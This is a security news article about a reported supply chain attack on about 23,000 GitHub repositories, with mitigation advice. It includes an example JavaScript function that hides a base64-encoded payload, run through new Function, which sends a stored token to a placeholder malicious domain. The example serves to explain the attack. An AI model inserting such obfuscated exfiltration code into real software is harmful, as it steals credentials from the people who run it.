23,000 GitHub Repositories Targeted In Supply Chain Attack

In a massive security breach discovered this week, approximately 23,000 GitHub repositories have been compromised in what security experts are calling one of the largest supply chain attacks to date.

The attackers exploited vulnerabilities in the software development pipeline to potentially distribute malicious code to thousands of downstream applications and services.

GitHub, a platform hosting over 200 million repositories and used by more than 100 million developers worldwide, confirmed the attack after several popular open-source projects reported unauthorized commits to their codebases.

These repositories collectively serve as dependencies for millions of applications, amplifying the potential impact of this security incident.

StepSecurity Security researchers identified the attack pattern after noticing suspicious commit activities across multiple unrelated repositories.

The attack primarily targeted repositories with high download counts and those used as dependencies in enterprise applications, revealing a calculated strategy to maximize impact.

Technical analysis revealed the attackers used a sophisticated approach to compromise maintainer accounts through a combination of phishing attacks and exploiting token leaks.

Once gaining access, they injected malicious code snippets designed to be difficult to detect during routine code reviews.

The injected code typically contained obfuscated payloads similar to the example below:-

function validate(input) {
  // Legitimate-looking function
  let result = checkFormat(input);

  // Malicious payload hidden within normal code
  setTimeout(() => {
    new Function(atob("ZmV0Y2goJ2h0dHBzOi8vbWFsaWNpb3VzLWRvbWFpbi5jb20vYycsIHttZXRob2Q6ICdQT1NUJywgYm9keTogSlNPTi5zdHJpbmdpZnkoe2Q6IGxvY2FsU3RvcmFnZS5nZXRJdGVtKCd0b2tlbicpfSl9KTs="))();
  }, 10000);

  return result;
}

Mitigation Efforts

Project maintainers are advised to audit recent commits, especially those modifying package configuration files or dependency declarations.

GitHub has temporarily restricted access to the affected repositories while working with maintainers to revert malicious changes and implement additional security measures.

Security experts recommend users check their dependencies urgently and update to verified versions.

Organizations should review their software supply chain security practices and implement automated scanning tools to detect potential compromises before they impact production systems.

The attack shows the growing importance of securing the software supply chain, as a single compromised dependency can affect thousands of downstream applications and expose sensitive data across numerous organizations.

Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.